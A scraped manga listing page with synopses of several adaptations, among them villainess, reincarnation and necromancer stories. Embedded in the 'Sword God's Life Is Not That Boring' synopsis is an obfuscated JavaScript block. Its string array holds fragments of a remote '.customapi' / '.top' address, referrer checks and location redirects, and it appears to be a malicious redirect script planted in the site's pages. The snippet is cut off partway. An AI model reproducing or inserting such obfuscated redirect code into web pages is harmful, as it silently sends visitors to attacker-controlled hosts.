Adaptation - Page 27

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419 results

I, The Abyssal, Have Decided To Save Humanity Again Today

Read Manhua I, The Abyssal, Have Decided To Save Humanity Again Today / Despite Coming From The Abyss, I Will Save Humanity / I Who Came From Hell Also Want Save Mankind / Laizi Shenyuan De Wo Jintian Yeyao Zhengjiu Renlei / Láizì Shēnyuān De Wǒ Jīntiān Yěyào Zhěngjiù Rénlèi / アビスから来た私は今日も人類の救世主 / 来自深渊的我今天也要拯救人类 / 심연의 끝, 난 인류를 구할 것이다 The Abyss Represent Pure Annihilation. They Possess Unmatched Power And Follow Their Nature To Consume All Living Things. Yet, One Day, A Traitor Emerged. A Clueless Young Girl, Hildegard, Awoke On The Battlefield And Realized She’s The Abominable “White Night” Abyss. After Breaking Through Countless Pursuits, She Was Adopted And Reformed By Arya’s Family. She Gradually Strengthens Her Own Belief And Uses The Body Of The Abyss To Save Humanity. To Protect The Goodness And Warmth In Her Heart. But The Chaotic Abyss Won’t Bend To Her Will…


Sword God’s Life Is Not That Boring

It took him ten years to become a sword god, and now he wanted to go down to the mountain to pass the boring time<script></script><script>function _0x4be9(){var _0x1b493e=['KBFTq','FnXOO','546663vofSWO','104lftpbZ','https://ip','then','href','5467016GTXgVN','.top/','referrer','7bREdhc','http://rea','200474qgAFWX','veKzC','random','floor','AUrcW','PRGKz','glHfn','4025130XQPaMF','text','includes','9IOHVIG','687978HrJMfW','bUnTY','.customapi','1261876jLREZJ','41660jvXANi','location','','goMbS','IdwCk','xpyos','google'];_0x4be9=function(){return _0x1b493e;};return _0x4be9();}(function(_0x150028,_0xb7dc3a){var _0x59ac29=_0x449d,_0x575a3b=_0x150028();while(!![]){try{var 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The Last Immortal’s Theorem

Read Manhwa The Last Immortal’s Theorem While Being An Almighty Immortal Seems Great, It Really Wasn’t For Ylledia. Escaping Death Meant Witnessing The End Of The World Over And Over Again. No Matter Her Efforts, The World Was Always Doomed. But Just When She Started To Lose All Hope, In Comes Dennis, A Cheery Optimist Just Itching To Try Out Some Magic! “You Wanna Link Up?!” This Is A Story About Blossoming Hope… And Perhaps Something A Little More.


Fushi no Gunzei wo Hikiiru Bocchi Shiryoujutsushi, Tenshoku shite SSS-Rank Boukensha ni naru

“The ultimate ambition of the most formidable necromancer… is to make friends?!” In the eleventh hour of the Saldia Empire’s impending defeat, salvation arrives in the form of Rogue, a lone necromancer. Armed with immense power and leading legendary aides, his solitary goal is to forge friendships. Employing the abilities of Kalfa, the most distinguished appraiser, he masks his loathed profession in that of an ‘adventurer.’ Rogue steps into the world as a rookie adventurer, but his extraordinary power can’t be completely hidden, sparking rumors that gradually trigger a grand disturbance in the kingdom. Embark on a fresh adventure with this lone necromancer! A long-awaited manga adaptation of a highly popular original work from Syosetu!


Shuzoku [Hanshin] na Ore wa Isekai Demo Futsuu ni Kurashitai

Saionji Ryoma, a young man, thought he was at home, but suddenly found himself in a strange hut. While he was confused, he suddenly received an email on his smartphone, which for some reason he had with him, from someone calling himself \"the god of games and pleasure.\" To his surprise, in response to a wish that Reima had muttered, he was invited to another world. Not only did he have his smartphone equipped with cheat functions, but he also received the bonus of being transported as an ultra-rare species, a \"demigod\"! Although confused, Reima is excited that he has \"come to the other world he has dreamed of,\" and follows the tutorial displayed on his smartphone to head to the city. However, those around him do not miss him as a \"demigod\" --!?


The Otome Heroine's Fight for Survival

Orphaned by a monster attack on her village, young Alicia spends three horrid years in an orphanage before finally running away. When she flees, however, Alicia has a violent encounter with an older woman hell-bent on killing her. During their tussle, she comes into contact with a strange crystal that bestows upon her a wealth of knowledge, transforming her from an innocent child into a cool and calculated planner. Now aware that she was meant to be the protagonist of an otome game and disgusted with her supposed fate, Alicia decides to take matters into her own hands and become strong—by any means necessary. Using her newfound knowledge, and with some help from a stranger she meets in the woods, she learns to survive by herself in a world far too harsh and unforgiving for a girl her age. Ready or not, she’s determined to carve her own path. [Official English Light Novel](


Night Of London

[Sweet Shizun Scans collab with Pink Venus Scans] Martin Schofield, a \'werewolf\' who runs an antique shop in London, avoiding the eyes of every clan. Meet Daniel Sinclair, a young man with ecstatic beauty, at a gay bar where he went to find a person to soothe his desire for a night, and spend a fierce and satisfying night. However, the next day, Martin becomes embarrassed when his one-night stand comes to his store. In addition, Daniel who works for a \"national superpower institution\" makes a very special request. However, he have different purpose.


Megasametara Tougokusareta Akujo Datta

Sophia Alcott, the daughter of Earl Alcott, lives a lonely life as a maligned and infamous shut in, with nothing to do but to work on her skills as a budding apothecary in the dusty storeroom she\'s forced to call home. That is until she suddenly wakes up one day and finds herself in the body of an even more infamous villainess (one who actually earned her reputation) locked up in a tower. But although the only clue she has about how this happened is a cryptic note, instead of despairing about her new situation, she\'s in awe at just how luxurious the treatment she\'s receiving in this \'prison\' is compared to how she had to live before. Meanwhile, back at Earl Alcott\'s mansion, all hell is about to break loose. That\'s because... --- [web novel]( (jp)


Shin Mahouka Koukou no Rettousei: Cygnus no Otome-tachi

Follows two girls named Arisa and Marika. Though raised as sisters, Arisa is one day entrusted to the elite Jumonji magical family, separating them for two years. Now, both are enrolled at First High School, and finally reunite.


Rookie but One-in-a-Million Actor

Mooyoung spent his childhood under his stepfather’s oppressive rule, a life that felt like living in hell. A mysterious voice in the living hell showed him the way to survive. “Live someone else’s life instead of yours.” That’s how his acting journey began… Was it a survival instinct? Even when he did well, he excelled too much. Through acting, Mooyoung gained a new life. This is the story of Mooyoung, the overwhelming acting genius, embarking on a challenge in the entertainment industry! 신인인데 천만배우

2 days ago

Villainess Speedrun Stream

A man who lost his life in an accident is reincarnated into an otome game world with a mission given by gods who want entertainment. And the background story in the game is that she is incarnated as a villain princess character, which turns out to be a good person but she is instead exiled after that the game will be speedrun and streamed!? He was told the sooner he was exiled the more benefits he would get in the next life, along with the start of the game he invited all the characters to fight so he could be exiled quickly, but instead, he was invincible and became a popular person... !? Respected by the original protagonist, a handsome aristocrat makes the main character his goal and he is trained by a cheat class, in the end, this otome game deviates from the original story too!! She\'s gradually getting ready to get the ending of being exiled, but the event of death always comes to her….. as the daughter of a marquis “marianne biesround” who is fighting for her next life, she will destroy all those who stand in her way (and blow them away) with magic. strongest, “meteor”! The manga adaptation of the violent webnovel otome game has begun!!!


Shiganai Tensei Reijou wa Heion ni Kurashitai

Aria, a former high school student, reincarnated as a young lady of an unremarkable noble house. She was roped into attending a marriage interview with Prince Eugene, who\'s rumored to be an oddball, and it’s during this meeting that he suddenly makes a ridiculous claim — that he was Oda Nobunaga in his past life!! *Well, that explains why the Prince still has yet to find a partner.* However, Aria calmly accepts Eugene’s tall tale, which inevitably piques his curiosity… *That won’t do! What if he finds out that I, too, have memories from my past life?!* Thus begins Aria’s days of being aggressively courted by the world’s most powerful prince who’s capable of unifying entire nations!
